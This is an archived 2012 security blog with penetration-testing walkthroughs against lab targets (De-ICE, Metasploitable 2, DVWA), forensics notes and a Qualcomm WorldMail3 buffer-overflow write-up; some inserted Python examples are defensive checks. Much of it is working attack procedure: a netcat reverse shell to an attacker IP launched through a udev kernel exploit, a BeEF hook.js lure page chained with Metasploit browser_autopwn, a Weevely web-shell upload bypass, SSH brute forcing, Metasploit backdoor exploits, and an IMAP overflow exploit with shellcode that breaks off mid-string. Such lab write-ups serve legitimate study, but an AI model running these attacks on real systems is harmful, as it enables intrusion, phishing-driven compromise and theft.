
Wednesday, 14 November 2012

Slax De-ICE v2.100 Solution

Posted by at 07:46

# Information Gathering


Scanning using Netdiscover:

Scanning with Nmap:
Result of the information gathering:
root@bt:~# nmap -sS -A 192.168.2.100

Starting Nmap 6.01 ( http://nmap.org ) at 2012-11-12 04:49 EST
Nmap scan report for 192.168.2.100
Host is up (0.0011s latency).
Not shown: 992 filtered ports
PORT STATE SERVICE VERSION
20/tcp closed ftp-data
21/tcp open ftp vsftpd 2.0.4
22/tcp open ssh OpenSSH 4.3 (protocol 1.99)
|_sshv1: Server supports SSHv1
| ssh-hostkey: 2048 83:4f:8b:e9:ea:84:20:0d:3d:11:2b:f0:90:ca:79:1c (RSA1)
| 2048 6f:db:a5:12:68:cd:ad:a9:9c:cd:1e:7b:97:1a:4c:9f (DSA)
|_2048 ab:ab:a8:ad:a2:f2:fd:c2:6f:05:99:69:40:54:ec:10 (RSA)
25/tcp open smtp Sendmail 8.13.7/8.13.7
| smtp-commands: slax.example.net Hello [192.168.2.105], pleased to meet you, ENHANCEDSTATUSCODES, PIPELINING, 8BITMIME, SIZE, DSN, ETRN, AUTH DIGEST-MD5 CRAM-MD5, DELIVERBY, HELP,
|_ 2.0.0 This is sendmail version 8.13.7 2.0.0 Topics: 2.0.0 HELO EHLO MAIL RCPT DATA 2.0.0 RSET NOOP QUIT HELP VRFY 2.0.0 EXPN VERB ETRN DSN AUTH 2.0.0 STARTTLS 2.0.0 For more info use "HELP ". 2.0.0 To report bugs in the implementation see 2.0.0 http://www.sendmail.org/email-addresses.html 2.0.0 For local information send email to Postmaster at your site. 2.0.0 End of HELP info
80/tcp open http Apache httpd 2.0.55 ((Unix) PHP/5.1.2)
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-title: Site doesn't have a title (text/html).
110/tcp open pop3 Openwall popa3d
|_pop3-capabilities: capa
143/tcp open imap UW imapd 2004.357
|_imap-capabilities: LOGIN-REFERRALS THREAD=ORDEREDSUBJECT UNSELECT SCAN AUTH=LOGINA0001 MAILBOX-REFERRALS BINARY IMAP4REV1 completed THREAD=REFERENCES SASL-IR OK CAPABILITY SORT STARTTLS LITERAL+ IDLE NAMESPACE MULTIAPPEND
443/tcp closed https
MAC Address: 08:00:27:E7:A0:2B (Cadmus Computer Systems)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:kernel:2.6
OS details: Linux 2.6.13 - 2.6.32
Network Distance: 1 hop
Service Info: Host: slax.example.net; OS: Unix

TRACEROUTE
HOP RTT ADDRESS
1 1.13 ms 192.168.2.100

On the web page at 192.168.2.100:80 I found some credential information about the developer and marketer.

# Service Enumeration


20/tcp closed ftp-data
21/tcp open ftp vsftpd 2.0.4
22/tcp open ssh OpenSSH 4.3 (protocol 1.99)
25/tcp open smtp Sendmail 8.13.7/8.13.7
80/tcp open http Apache httpd 2.0.55 ((Unix) PHP/5.1.2)
110/tcp open pop3 Openwall popa3d
143/tcp open imap UW imapd 2004.357

# Vulnerability Assessment

 1.    FTP Login Anonymous allowed
 2.    OpenSSH Denial of Service
 3.    Directory Listing

# Exploitation

First, I was interested in the FTP login, but I didn't get anything from the FTP service.

Second, I tried the OpenSSH denial-of-service vulnerability. Using this exploit, the SSH service went down temporarily: /pentest/exploits/exploitdb# platforms/multiple/dos/2444.sh

Third, I tried directory listing on the HTTP service. This part is separated into 3 steps:
  1. Create a user list from the information available on their web site.
  2. Create a file list of common user files on a Linux system.
  3. Combine the user list and the file list with dirb; dirb is available in BackTrack.

Dirb usage:

root@bt:/pentest/web/dirb# ./dirb http://192.168.2.101/ /root/Slax2.100/credential.txt,/root/Slax2.100/filelist.txt -w -l

-----------------
DIRB v2.03
By The Dark Raver
-----------------

START_TIME: Mon Nov 12 22:26:48 2012
URL_BASE: http://192.168.2.101/
WORDLIST_FILES: /root/Slax2.100/credential.txt,/root/Slax2.100/filelist.txt
OPTION: Printing LOCATION header
OPTION: Not Stoping on warning messages

-----------------

GENERATED WORDS: 348

---- Scanning URL: http://192.168.2.101/ ----
+ http://192.168.2.101/~havisham/
==> DIRECTORY
+ http://192.168.2.101/~magwitch/
==> DIRECTORY
+ http://192.168.2.101/~pirrip/
==> DIRECTORY
+ http://192.168.2.101/.
(FOUND: 200 [Ok] - Size: 579)
+ http://192.168.2.101/..
(FOUND: 400 [Bad Request] - Size: 313)

---- Entering directory: http://192.168.2.101/~havisham/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
+ http://192.168.2.101/~havisham/.
(FOUND: 200 [Ok] - Size: 570)
+ http://192.168.2.101/~havisham/..
(FOUND: 200 [Ok] - Size: 579)

---- Entering directory: http://192.168.2.101/~magwitch/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
+ http://192.168.2.101/~magwitch/.
(FOUND: 200 [Ok] - Size: 570)
+ http://192.168.2.101/~magwitch/..
(FOUND: 200 [Ok] - Size: 579)

---- Entering directory: http://192.168.2.101/~pirrip/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
+ http://192.168.2.101/~pirrip/.
(FOUND: 200 [Ok] - Size: 566)
+ http://192.168.2.101/~pirrip/..
(FOUND: 200 [Ok] - Size: 579)
+ http://192.168.2.101/~pirrip/.ssh/
==> DIRECTORY

---- Entering directory: http://192.168.2.101/~pirrip/.ssh/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
+ http://192.168.2.101/~pirrip/.ssh/.
(FOUND: 200 [Ok] - Size: 816)
+ http://192.168.2.101/~pirrip/.ssh/..
(FOUND: 200 [Ok] - Size: 566)

-----------------
DOWNLOADED: 1740 - FOUND: 10



From the dirb output, you can see the ~pirrip/.ssh/ listing. Open it in your browser and download id_rsa and id_rsa.pub. These two files are the SSH key pair used for authentication. Now connect to the target machine with ssh.

# ssh -i id_rsa pirrip@192.168.2.100

Well, we are connected to the target machine. But we don't know the password of pirrip.

Finally, I used grep to find strings containing "Password".

# grep -r "Password" /

After a long time, I got the password of pirrip -> 0l1v3rtw1st
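
A defender-side check for the exposure used above, added here as an example and not part of the original walkthrough: it walks a directory tree that the web server publishes (on this target, the per-user ~user/ directories) and reports every private key reachable from it. The tree layout, the function names and the sample key file are constructed for illustration.

```python
import os
import stat
import tempfile

# PEM header lines that mark a private key file.
LEGACY_HEADERS = (
    b"-----BEGIN RSA PRIVATE KEY-----",
    b"-----BEGIN DSA PRIVATE KEY-----",
    b"-----BEGIN EC PRIVATE KEY-----",
)
PKCS8_PLAIN = b"-----BEGIN PRIVATE KEY-----"
PKCS8_ENCRYPTED = b"-----BEGIN ENCRYPTED PRIVATE KEY-----"
OPENSSH_NEW = b"-----BEGIN OPENSSH PRIVATE KEY-----"


def classify_key(path):
    """Return None for non-key files, else the passphrase state of the key."""
    try:
        with open(path, "rb") as fh:
            head = fh.read(512)
    except OSError:
        return None
    if head.startswith(LEGACY_HEADERS):
        # Legacy PEM keys declare encryption in a Proc-Type header line.
        return "passphrase" if b"Proc-Type: 4,ENCRYPTED" in head else "no passphrase"
    if head.startswith(PKCS8_ENCRYPTED):
        return "passphrase"
    if head.startswith(PKCS8_PLAIN):
        return "no passphrase"
    if head.startswith(OPENSSH_NEW):
        return "unknown"  # the cipher name sits inside the base64 body
    return None


def audit_served_tree(web_root):
    """List private keys that sit anywhere below a directory served over HTTP."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(web_root):
        dirnames.sort()  # deterministic walk order
        for name in sorted(filenames):
            full = os.path.join(dirpath, name)
            state = classify_key(full)
            if state is None:
                continue
            mode = stat.S_IMODE(os.stat(full).st_mode)
            findings.append({
                "path": os.path.relpath(full, web_root),
                "passphrase": state,
                "mode": oct(mode),
                # ssh itself refuses keys readable by group or others
                "loose_permissions": bool(mode & 0o077),
            })
    return findings


def build_sample_tree(root):
    """Constructed layout modelled on the ~user directories in the dirb output."""
    ssh_dir = os.path.join(root, "pirrip", ".ssh")
    os.makedirs(ssh_dir)
    os.makedirs(os.path.join(root, "havisham"))
    files = {
        os.path.join(root, "havisham", "index.html"): b"<html>constructed</html>\n",
        os.path.join(ssh_dir, "id_rsa.pub"): b"ssh-rsa CONSTRUCTED pirrip@example\n",
        os.path.join(ssh_dir, "id_rsa"): (
            b"-----BEGIN RSA PRIVATE KEY-----\n"
            b"CONSTRUCTED-PLACEHOLDER-NOT-A-KEY\n"
            b"-----END RSA PRIVATE KEY-----\n"
        ),
    }
    for path, content in files.items():
        with open(path, "wb") as fh:
            fh.write(content)
        os.chmod(path, 0o644)  # world-readable, as a web server needs


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as root:
        build_sample_tree(root)
        for finding in audit_served_tree(root):
            print(finding)
```

Any finding means the key must be treated as disclosed: remove it from the served tree and replace the key pair.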

Friday, 9 November 2012

Slax v.110

Posted by at 02:56
# Information Gathering

In this part, I will do information gathering on the target using Nmap with the command:
# nmap -sS -A 192.168.1.110
and it returns the result ->


# Service Enumeration

FTP (vsftpd)
SSH
CUPS Print
HTTPd

# Vulnerability Assessment

From the Information Gathering and Service Enumeration results, we know that FTP allows users to log in anonymously. Maybe we can get some interesting files inside.

Earlier, I tried to get each file on it, but I'm interested in the core file.
Download it and open it. I opened it using cat, look scream...
Try to open it with the 'strings' command: w00t, we got the strings of the shadow file.
Now separate the shadow strings from the rest and copy them into a text editor.




# Exploitation

Now it's time to crack the shadow file. I used John the Ripper to do this job. And finally, we got it. Enjoy!


Saturday, 3 November 2012

Network Forensic Puzzle #1

Posted by at 07:39
Yesterday I was learning about network forensics, and my case is a packet capture taken with Wireshark. You can download the capture file here.

After downloading the capture, we can open it with DD and then capture it.
For a short tutorial we can use the dumb way. In this case I will pull out the data named "recovery.docx". So, we need to know the header / magic number of docx files.
If you don't know about magic numbers, you can look them up on Google with the keywords magic number programming. The magic number of a docx file is 504B. OK, you have the key now.

Now I will use tcpflow to split the capture file into separate flows.

# tcpflow -r evidence.pcap

One of the split files is 192.168.001.158.05190-192.168.001.159-01272. For this short tutorial, I selected the split file that contains receipe.docx.

The captured file contains hex. With xxd you can see the hex of the captured file. I used the dumb trick to pull out the captured file. First I convert the file into raw hex.

# xxd -ps 192.168.001.158.05190-192.168.001.159-01272 > raw.txt

Open raw.txt with a text editor like gEdit or Kate. Then search for 504B and go to the first result. Remove the lines/text before 504B, and then save it.

Back to xxd, and convert raw.txt into binary.

# xxd -r -ps raw.txt > receipe.docx

Finally, open receipe.docx with a word processor like MS Office or LibreOffice.
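
The same carving done on bytes instead of on hex text, as an added example that is not part of the original post: a text search for 504B in the xxd output can match across a byte boundary, and deleting only the leading text leaves whatever follows the document attached. The sample flow, its header and trailer bytes and the function names are constructed.

```python
import io
import struct
import zipfile

LOCAL_FILE_HEADER = b"PK\x03\x04"   # bytes 50 4B 03 04: start of the first ZIP entry
END_OF_CENTRAL_DIR = b"PK\x05\x06"  # record that closes the archive
EOCD_FIXED_SIZE = 22                # fixed part; a variable-length comment may follow


def first_hex_text_hit(stream):
    """Nibble index of the first '504b' in the hex text, as an editor search sees it."""
    return stream.hex().find("504b")


def carve_zip(stream):
    """Return (offset, archive_bytes, member_names) for the ZIP/docx in a flow, or None."""
    start = stream.find(LOCAL_FILE_HEADER)
    if start == -1:
        return None
    eocd = stream.rfind(END_OF_CENTRAL_DIR)
    if eocd < start or eocd + EOCD_FIXED_SIZE > len(stream):
        return None
    # The comment length is the last 16-bit field of the fixed EOCD record.
    (comment_len,) = struct.unpack_from("<H", stream, eocd + 20)
    end = eocd + EOCD_FIXED_SIZE + comment_len
    if end > len(stream):
        return None
    candidate = stream[start:end]
    try:
        with zipfile.ZipFile(io.BytesIO(candidate)) as archive:
            if archive.testzip() is not None:  # CRC check of every member
                return None
            names = archive.namelist()
    except zipfile.BadZipFile:
        return None
    return start, candidate, names


def build_sample_flow():
    """Constructed stand-in for one tcpflow output file: header + docx + trailer."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as archive:
        archive.writestr("[Content_Types].xml", "<Types/>")
        archive.writestr("word/document.xml", "<w:document>constructed sample</w:document>")
    docx = buf.getvalue()
    # 05 04 b0 reads as "...0504b0..." in hex text: a '504b' hit that starts mid-byte.
    preamble = b"HDR2" + b"\x05\x04\xb0" + b"constructed transfer header"
    trailer = b"constructed transfer trailer"
    return preamble + docx + trailer, docx, len(preamble)


if __name__ == "__main__":
    flow, docx, true_offset = build_sample_flow()
    hit = first_hex_text_hit(flow)
    print("first hex-text hit at nibble", hit, "(mid-byte)" if hit % 2 else "(aligned)")
    offset, carved, names = carve_zip(flow)
    print("archive starts at byte", offset, "length", len(carved), "members", names)
```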

Memory Forensic

Posted by at 01:10
Today I was learning about memory forensics. My target is Windows XP; beforehand I dumped the memory from Windows XP using AccessData FTK. After dumping the memory, I copied the memory dump into BackTrack and then opened it using Volatility.
# ./vol.py -f /path/of/memorydump.mem imageinfo
After running the command above, you will see some information about the memory image.

Using Volatility you can see processes, networking, and much more.
The image above shows some features of the Volatility tool.




I think we can dump passwords for a Windows machine using Volatility. You can use hashdump and hivelist.


The images below show how many connections there are on my Windows machine. We can see that someone with IP address 192.168.56.102 connected to my machine on ports 6660 and 4444 in the same PID. Maybe someone attacked my machine using a vulnerability in BigAnt and connected back by opening port 4444.


In this case, we can see the history of cmd commands typed by the user before the memory was dumped using FTK.


Monday, 29 October 2012

How to get pwnOS IP Address

Posted by at 17:30
Yesterday, I was learning about pwnOS, the vulnerable operating system for a penetration testing lab. Then I tried to run pwnOS in VMware; after booting, when the login prompt appeared, a question came to my mind: what is the IP address of pwnOS?

I tried to scan from the BackTrack machine using nmap, but found nothing. Then I tried to open pwnOS using VirtualBox, scanned again using nmap, and finally I got it. From this problem, I conclude that VMware doesn't give pwnOS an IP address before we log in to the pwnOS system.
But in VirtualBox, the IP is given before we log in to pwnOS.

So, the conclusion is:

If we are using VMware, we need to log in to the pwnOS system to get the IP address, but
if we are using VirtualBox, we don't need to log in to get the IP address.

Friday, 26 October 2012

Linux Tools for Digital Forensic

Posted by at 20:04
Here are common tools used for digital forensics in Linux:

# DD

The dd tool is used to clone a device such as a hard drive. dd produces a clone that looks like the original device. If the size of the device is 500GB, the resulting clone is 500GB too.
The command for a dd clone:
# dd if=/dev/sda of=/tmp/forensic
if : input file
of : output file

# FDISK

Fdisk is commonly used for hard drive partitioning. In digital forensics, you can use fdisk for carving information from the device.
# fdisk -ul /path/of/clonning/device

# MD5SUM

md5sum is usually used for getting the hash of a device or file. With md5sum, you can keep the integrity of your digital evidence.
The command for md5sum:
# md5sum file_or_device

# XXD

xxd is used for getting the byte offset. Using xxd, it is easy to get the offset of a file.
The command is:
# xxd clone_images

Introduction of Computer Forensic

Posted by at 19:52

# What is Computer Forensic ?

Computer forensics is the process of finding, searching, analysing and collecting evidence from a computer system, following forensic standards and with documentation, for use as legal evidence in court.

# What is Unallocated Space ?

Unallocated Space, usually called "Free Space", is a logical space on the hard drive that the operating system. The space is not used by the operating system before it is formatted; the opposite of Unallocated Space is commonly called Allocated Space. Allocated Space is used by the operating system to write data or files.

# What is Slack Space ?

Slack Space refers to space that is not fully used by the currently allocated file and which may contain data from a previously deleted file. For details, please see the images below:


Monday, 22 October 2012

Hacking DVWA and got the ROOT

Posted by at 16:18
Hello all, today I was learning about DVWA, and I want to hack DVWA until I get root. I'm using the upload feature with the high security level. Beforehand, I prepared a PHP backdoor generated using Weevely.

# Create Backdoor with Weevely

Go to the terminal and type:
cd /pentest/web/backdoors/weevely

Create the backdoor with this command:
./weevely.py generate secret cobasaja.php
See the picture below for details.



# Upload the Backdoor and Bypass DVWA protection with Burp Suite

Upload the backdoor that was created using Weevely.
You will see that the upload fails. OK, we can bypass that using Burp Suite.
Open Burp Suite and make sure intercept is on.

Open your browser and set the proxy to Burp Suite: 127.0.0.1:8080
Go back to DVWA and re-upload the backdoor. Burp Suite will intercept it.
Edit the filename by adding the .jpg extension.
Next, press the Forward button.


Hooray, the backdoor uploaded successfully...
Now connect to the backdoor from our machine with this command:
./weevely.py http://192.168.56.102/dvwa/hackable/uploads/cobasaja.php.jpg secret
OK, now your machine is connected to the backdoor.
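
A server-side check that would have refused the renamed upload, added here as an example and not taken from DVWA or the original post. It assumes the target executed cobasaja.php.jpg because the web server maps a .php segment anywhere in a filename to the PHP handler; the extension list, the type table and the function names are assumptions of this example.

```python
import os
import secrets

# Extensions a PHP-enabled web server may map to a script handler (assumed list).
SCRIPT_EXTENSIONS = {"php", "php3", "php4", "php5", "phtml", "phar", "pht"}

# canonical extension -> (client extensions accepted, magic byte prefixes)
IMAGE_TYPES = {
    "jpg": ({"jpg", "jpeg"}, (b"\xff\xd8\xff",)),
    "png": ({"png"}, (b"\x89PNG\r\n\x1a\n",)),
    "gif": ({"gif"}, (b"GIF87a", b"GIF89a")),
}

# Constructed sample inputs.
SAMPLE_PHP = b"<?php /* constructed placeholder, not a working script */ ?>"
SAMPLE_JPEG = b"\xff\xd8\xff\xe0" + b"\x00" * 16


class UploadRejected(Exception):
    """Raised when an upload fails validation; the message says why."""


def validate_upload(client_filename, data):
    """Return a server-chosen storage name, or raise UploadRejected.

    Filename and Content-Type arrive from the client and can be rewritten in
    an intercepting proxy, so only the bytes and our own rules are trusted.
    """
    if "\x00" in client_filename:
        raise UploadRejected("NUL byte in filename")
    base = os.path.basename(client_filename.replace("\\", "/"))
    parts = base.lower().split(".")
    if len(parts) < 2 or not parts[0]:
        raise UploadRejected("missing name or extension")
    extensions = parts[1:]
    # A script extension anywhere in the name is refused, not only at the end.
    for ext in extensions:
        if ext in SCRIPT_EXTENSIONS:
            raise UploadRejected("script extension '.%s' in filename" % ext)
    if len(extensions) != 1:
        raise UploadRejected("more than one extension")
    for canonical, (accepted, magics) in IMAGE_TYPES.items():
        if extensions[0] in accepted:
            if not data.startswith(magics):
                raise UploadRejected("content is not a %s image" % canonical)
            # Never reuse the client name: store under a random one.
            return "%s.%s" % (secrets.token_hex(16), canonical)
    raise UploadRejected("extension '.%s' not allowed" % extensions[0])


def is_rejected(client_filename, data):
    """Convenience wrapper: True when validate_upload refuses the upload."""
    try:
        validate_upload(client_filename, data)
    except UploadRejected:
        return True
    return False


if __name__ == "__main__":
    for name, data in [("cobasaja.php.jpg", SAMPLE_PHP),
                       ("cobasaja.jpg", SAMPLE_PHP),
                       ("holiday.JPEG", SAMPLE_JPEG)]:
        try:
            print(name, "-> stored as", validate_upload(name, data))
        except UploadRejected as exc:
            print(name, "-> rejected:", exc)
```

Content sniffing does not stop a file that is both a valid image and a script, so the upload directory should also be served with script handlers disabled.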

# ROOTING

Now, I will search for available users on the target machine.
cat /etc/passwd

Yuhu, we found a user named msfadmin.
I will crack this user with medusa:
medusa -h 192.168.56.101 -u msfadmin -P /pentest/passwords/wordlists/darkc0de.lst -e ns -M ssh
* -h : hostname
* -u : username
* -P : path of the wordlist
* -e : password options; ns for blank password and username same as password
* -M : module

Haha, I got the password for username msfadmin: "msfadmin" is the password for msfadmin.

What happens if the brute force fails? Then we must try a local exploit. I will use the udev exploit for the Linux kernel. You can download the kernel exploit here

After downloading the kernel exploit, we need to compile it.
gcc 8572.c -o udev
Now, create a script that makes the target machine connect to our machine with netcat using root access.
echo '#!/bin/bash' > /tmp/run
echo '/bin/netcat -e /bin/bash 192.168.56.102 4444' >> /tmp/run
* please note that 192.168.56.102 is our IP (attacker)

Back on our machine, make our system listen on port 4444
nc -lvp 4444

Check the PID of udev using the following command:
cat /proc/net/netlink
You can see that the PID is 2441. We will need this PID.

Now back to our exploit: run the compiled exploit followed by the PID
./udev 2441


Go to our netcat and type id and whoami; you will see that you have root.


Friday, 19 October 2012

Social Engineering + BeEF + Metasploit, finally pwned

Posted by at 11:58
Heiyo, today we will learn about pwning a victim through the browser. My scenario is:

  1. Make the user visit our page, with social engineering
  2. Set up BeEF
  3. Set up Metasploit browser_autopwn
  4. Play and pwned
OK, let's do it.



#1. Social Engineering


Social engineering with the best plan will give the best result. I plan to make a link for the target. Of course the link must create interest. In this case I will create a page that contains Ayana images (JKT48 personnel). She is a beautiful girl, so the target victim is male, of course. Hehe
Prepare the Ayana image, named cantik.jpg
Let's create the page with the code below:
<html>
<head>
<title>Ayana.jpg</title>
<script src="http://192.168.56.101:3000/hook.js"></script> <!-- file JS from BeEF -->
</head>
<body>
<img src="cantik.jpg" />
</body>
</html>
Save this file with the name index.html
Place the file in this directory: /var/www/ayana.jpg/
* 192.168.56.101 is our IP address (attacker machine)
* ayana.jpg is a directory; this makes the URI look like it addresses an image file.

Run your Apache service to make it work.

#2. Setup BeEF

Run BeEF from Backtrack Tools->Exploitation->Social Engineering->BeEF
Open the BeEF panel in your browser at http://127.0.0.1:3000/ui/panel
Now, give the target the address http://192.168.56.101/ayana.jpg
You can use your favorite technique to give the link; maybe you can say "Hei bro, look at the beautiful girl here http://192.168.56.101/ayana.jpg"
Go back to the BeEF panel to monitor your target.

Here, my target is running Windows XP SP3 with IE 8 installed.

#3. Setup Metasploit browser_autopwn

I had read about browser_autopwn in Metasploit before (here), so I had the idea to use it in my scenario.
Open msfconsole, then type:
msf > use auxiliary/server/browser_autopwn
Show the options for this auxiliary module, type:
msf  auxiliary(browser_autopwn) > show options
Set LHOST to our IP address (attacker machine), type:
msf  auxiliary(browser_autopwn) > set LHOST 192.168.56.101
Run the auxiliary module, type:
msf  auxiliary(browser_autopwn) > run
Wait until you see that
At this point, we need to note the exploit address. http://192.168.56.101/paVleLsD
* 192.168.56.101 is our IP (attacker machine)

#4. Lets play the game

OK, the summary of the scenario is:
- Give the target a URL that contains the image. http://192.168.56.101/ayana.jpg
When the victim accesses this page, he/she will see this:

- After that, go back to the BeEF panel and see what happens there
The attacker was connected to BeEF with IE 8. Now redirect the victim to Metasploit. See the image below for details.

As we can see, Metasploit successfully gained access to the Windows system.

Now, check the sessions in Metasploit with the command:
sessions -l
Connect to Windows using meterpreter. Type:
sessions -i 2
* 2 is the id of the session in Metasploit


Wednesday, 17 October 2012

Metasploitable 2 has been pWned - Part 2

Posted by at 01:00
After posting about the pentest on Metasploitable v.2 (here), I will continue attacking the target machine using the result of the earlier Nmap scan. You can see the available services here.
OK, in this post the target service is Unreal IRCd.


  1. Run the Metasploit
  2. Search exploit for Unreal IRCd using metasploit
    # msf > search unreal irc
  3. It returns:
    exploit/unix/irc/unreal_ircd_3281_backdoor  2010-06-12 00:00:00 UTC  excellent  UnrealIRCD 3.2.8.1 Backdoor Command Execution
  4. Now, use the exploit above
    # msf > use exploit/unix/irc/unreal_ircd_3281_backdoor
  5. See the available configuration for this exploit
    # msf  exploit(unreal_ircd_3281_backdoor) > show options
    It returns:
    Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):
    
    Name   Current Setting  Required  Description
    ----   ---------------  --------  -----------
    RHOST                   yes       The target address
    RPORT  6667             yes       The target port
    
    
    Exploit target:
    
    Id  Name
    --  ----
    0   Automatic Target
  6. Set the RHOST,
    # msf  exploit(unreal_ircd_3281_backdoor) > set RHOST 192.168.56.103
  7. Show the available payloads,
    # msf  exploit(unreal_ircd_3281_backdoor) > show payloads
    It returns:
    Compatible Payloads
    ===================
    
       Name                     Disclosure Date  Rank    Description
       ----                     ---------------  ----    -----------
       cmd/unix/bind_perl                        normal  Unix Command Shell, Bind TCP (via Perl)
       cmd/unix/bind_perl_ipv6                   normal  Unix Command Shell, Bind TCP (via perl) IPv6
       cmd/unix/bind_ruby                        normal  Unix Command Shell, Bind TCP (via Ruby)
       cmd/unix/bind_ruby_ipv6                   normal  Unix Command Shell, Bind TCP (via Ruby) IPv6
       cmd/unix/generic                          normal  Unix Command, Generic Command Execution
       cmd/unix/reverse                          normal  Unix Command Shell, Double reverse TCP (telnet)
       cmd/unix/reverse_perl                     normal  Unix Command Shell, Reverse TCP (via Perl)
       cmd/unix/reverse_ruby                     normal  Unix Command Shell, Reverse TCP (via Ruby)
  8. I will use cmd/unix/reverse for a telnet connection,
    # msf  exploit(unreal_ircd_3281_backdoor) > set PAYLOAD cmd/unix/reverse
  9. See the configuration for the payload,
    # msf  exploit(unreal_ircd_3281_backdoor) > show options
    It returns:
    Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):
    
       Name   Current Setting  Required  Description
       ----   ---------------  --------  -----------
       RHOST  192.168.56.103   yes       The target address
       RPORT  6667             yes       The target port
    
    
    Payload options (cmd/unix/reverse):
    
       Name   Current Setting  Required  Description
       ----   ---------------  --------  -----------
       LHOST                   yes       The listen address
       LPORT  4444             yes       The listen port
    
    
    Exploit target:
    
       Id  Name
       --  ----
       0   Automatic Target
    
  10. Set the LHOST with our IP Address
    # msf  exploit(unreal_ircd_3281_backdoor) > set LHOST 192.168.56.101
  11. Now, launch the exploit
    # msf  exploit(unreal_ircd_3281_backdoor) > exploit
  12. OK, wait a minute and you will be brought into a Linux shell... type uname -a to test
    # uname -a

Metasploitable 2 has been PWNED with Metasploit

Posted by at 00:09
Hi all, today I want to share how to pwn Metasploitable v2.
You can download Metasploitable v2 here http://sourceforge.net/projects/metasploitable/files/Metasploitable2/
After installing Metasploitable 2 in a virtual machine, we start the steps of the pentest.


  1. Scan the running service on target machine
  2. Here, I'm using Nmap to do this job
    # nmap -sV -A 192.168.56.103
  3. I got this information about the services
    Starting Nmap 6.01 ( http://nmap.org ) at 2012-10-17 17:18 EDT
    Nmap scan report for 192.168.56.103
    Host is up (0.00097s latency).
    Not shown: 977 closed ports
    PORT STATE SERVICE VERSION
    21/tcp open ftp vsftpd 2.3.4
    22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
    23/tcp open telnet Linux telnetd
    25/tcp open smtp Postfix smtpd
    53/tcp open domain ISC BIND 9.4.2
    80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2)
    111/tcp open rpcbind (rpcbind V2) 2 (rpc #100000)
    139/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
    445/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
    512/tcp open exec netkit-rsh rexecd
    513/tcp open login?
    514/tcp open shell?
    1099/tcp open rmiregistry GNU Classpath grmiregistry
    1524/tcp open ingreslock?
    2049/tcp open nfs (nfs V2-4) 2-4 (rpc #100003)
    2121/tcp open ftp ProFTPD 1.3.1
    3306/tcp open mysql MySQL 5.0.51a-3ubuntu5
    5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7
    5900/tcp open vnc VNC (protocol 3.3)
    6000/tcp open X11 (access denied)
    6667/tcp open irc Unreal ircd
    8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
    8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1
  4. OK, too many services. I will try vsftpd 2.3.4
  5. Run Metasploit and search for an exploit for vsftpd 2.3.4
  6. Use the search command in Metasploit
    # msf> search vsftpd
  7. It will return
    exploit/unix/ftp/vsftpd_234_backdoor  2011-07-03 00:00:00 UTC  excellent  VSFTPD v2.3.4 Backdoor Command Execution
  8. Use the exploit above,
    # msf> use exploit/unix/ftp/vsftpd_234_backdoor
  9. Setting the exploit,
    # msf  exploit(vsftpd_234_backdoor) > show options
  10. Set the RHOST with the IP Target
    # msf  exploit(vsftpd_234_backdoor) > set RHOST 192.168.56.103
  11. Show the available PAYLOAD,
    # msf  exploit(vsftpd_234_backdoor) > show payloads
  12. Select the Payload,
    # msf  exploit(vsftpd_234_backdoor) > set PAYLOAD cmd/unix/interact
  13. Run the Exploit command,
    # msf  exploit(vsftpd_234_backdoor) > exploit
  14. Wait and you will be brought into a Linux shell. Type uname -a and you will see the kernel of Metasploitable 2.

Read my next post, Metasploitable 2 pwned with Metasploit - Part 2

Friday, 12 October 2012

Why POP POP RETN ?

Posted by at 06:52
When learning about bypassing SafeSEH protection, we often meet the instruction sequence POP POP RETN.
What is POP POP RETN?
Based on my knowledge, this sequence is the popular method to bypass SafeSEH. The stack holds 32-bit (4-byte) values. The first POP removes the value at the top of the stack into a register, the second POP removes the next value on the stack into another register, and finally RETN takes the value that is now first on the stack. So the system will execute code at the memory address taken by RETN.

Maybe you will understand POP POP RETN better after seeing the image above.

Qualcomm WorldMail3 Buffer Overflow

Posted by at 06:41
Today I want to learn about the buffer overflow in Qualcomm WorldMail3.
First, I make a fuzzer using the vulnerable character and command:
a001 LIST }
My fuzzer looks like this:

#!/usr/bin/python
import socket
buffer = "\x41" * 800
exploit = "a001 LIST " + buffer + "}" + "\r\n"
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("192.168.56.101",143))
s.recv(1024)
s.send(exploit)
s.close()

Open OllyDbg and attach to IMAP4.exe
Did the application crash? If yes, go to View->SEH Chain and press Shift+F9. EIP has been overwritten.
Now it's time to get the offset; in this case I found that the offset is 774. So, modify the fuzzer again. By the way, you need to restart your Windows.

#!/usr/bin/python
import socket
buffer = "\x41" * 774
buffer += "\xcc" * 4
buffer += "\x41" * (800-len(buffer))
exploit = "a001 LIST " + buffer + "}" + "\r\n"
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("192.168.56.101",143))
s.recv(1024)
s.send(exploit)
s.close()


Run OllyDbg and attach to IMAP4, then re-run the fuzzer.
What do you see? EIP was overwritten with CCCCCC, which means that the offset is accurate.
Check for a module that is not protected by SafeSEH; in this case mailcmn.dll is not protected.
Now search for the POP POP RETN opcodes; please note that the address must not contain 00, 0a or 0d.
Now edit the fuzzer to set up the payload:

#!/usr/bin/python
import socket
import os
import time
shellcode = "w00tw00t"
shellcode += ("\xb8\x1d\x77\xf6\x2c\xda\xca\x31\xc9\xb1\x51\xd9\x74\x24\xf4\x5a"
